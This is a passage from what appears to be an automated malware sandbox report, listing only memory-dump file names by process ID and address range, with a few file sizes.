                                                                                                      • memory/5116-255-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5124-353-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5148-356-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5192-343-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5204-346-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5220-321-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5264-324-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5336-325-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5344-355-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5348-349-0x0000000004720000-0x0000000004721000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5348-345-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5348-350-0x0000000007000000-0x0000000007001000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5432-328-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5448-352-0x0000000000402F68-mapping.dmp
                                                                                                      • memory/5520-357-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5552-362-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5576-329-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5592-359-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5624-330-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5748-334-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5748-366-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5768-351-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5784-337-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5784-368-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5816-363-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5860-360-0x0000000000000000-mapping.dmp
                                                                                                      • memory/5892-364-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6028-339-0x0000000000000000-mapping.dmp
                                                                                                      • memory/6080-365-0x0000000000000000-mapping.dmp